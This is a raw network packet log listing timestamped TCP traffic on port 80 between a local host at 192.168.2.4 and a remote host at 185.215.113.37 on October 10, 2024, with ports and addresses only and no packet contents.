Oct 10, 2024 18:23:16.639312029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639348984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639350891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639360905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639383078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639400959 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639461994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639477015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639492989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639492989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639507055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639509916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639523029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639539957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639610052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639619112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639628887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639641047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639655113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639657974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639672041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639674902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639681101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639689922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639709949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639852047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639863014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639879942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639892101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639894009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639909029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.639914989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639936924 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.639970064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640003920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640007019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640021086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640038013 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640054941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640191078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640201092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640217066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640228033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640232086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640244961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640258074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640259981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640270948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640276909 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640288115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640295982 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640316963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640484095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640492916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640511990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640523911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640526056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640539885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640548944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640552998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640569925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640572071 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640579939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640599012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640600920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640609026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640614986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640626907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640645027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640665054 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640815973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640825987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640842915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640847921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640858889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640861988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640873909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640878916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640889883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.640893936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640909910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.640932083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641072035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641082048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641098976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641110897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641114950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641128063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641140938 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641156912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641165972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641165972 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641166925 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641182899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641204119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641360998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641371012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641387939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641400099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641406059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641417027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641427040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641434908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641446114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641453028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641458035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641474009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641474962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641490936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641514063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641592979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641606092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641623020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641625881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641632080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641643047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641659975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641674042 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641738892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641750097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641767979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641777039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641782045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641788006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641807079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641849995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641861916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641877890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641880035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641891003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641905069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641908884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641921997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641932011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641937971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641947985 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641951084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641964912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.641969919 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.641988993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.642285109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.642294884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.642312050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.642324924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.642328978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.642339945 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.642340899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.642354012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.642369032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.642390966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763123989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763147116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763160944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763202906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763221025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763233900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763242006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763305902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763315916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763349056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763540983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763571978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763580084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763591051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763609886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763621092 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763678074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763689995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763705969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763721943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763744116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763777018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763808012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763873100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763883114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763899088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763910055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763916969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763926983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.763933897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.763958931 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764319897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764329910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764347076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764380932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764399052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764453888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764463902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764480114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764486074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764494896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764501095 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764523029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764633894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764647961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764668941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764678955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764684916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764697075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764708996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764713049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764725924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764743090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764756918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764812946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764858007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764909983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764919996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764938116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764950037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764952898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764966011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764966965 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764976025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764990091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.764991045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.764998913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765021086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765048981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765209913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765219927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765234947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765259027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765269041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765284061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765285015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765284061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765297890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765304089 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765314102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765326977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765330076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765347958 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765373945 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765515089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765526056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765575886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765634060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765646935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765662909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765674114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765688896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765693903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765702963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765712023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765716076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765732050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765746117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.765760899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.765785933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766026020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766036034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766057968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766069889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766084909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766097069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766107082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766112089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766124010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766129971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766139984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766154051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766154051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766186953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766479969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766489029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766503096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766506910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766518116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766520023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766535997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766544104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766547918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766563892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766567945 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766576052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766587973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766597986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766601086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766607046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766633987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766794920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766804934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766820908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766828060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766834021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766850948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766851902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766880989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766910076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766932964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766946077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766961098 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766962051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766979933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766980886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.766990900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.766998053 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767009974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767014980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767023087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767035961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767038107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767051935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767051935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767066002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767071962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767081976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767093897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767096996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767110109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767122984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767126083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767138004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767144918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767153978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767168999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767194033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767664909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767678022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767693996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767694950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767707109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767709970 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767721891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767726898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767736912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767738104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767746925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:16.767755985 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767775059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.767781973 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:16.853617907 CEST	80	49731	185.215.113.37	192.168.2.4
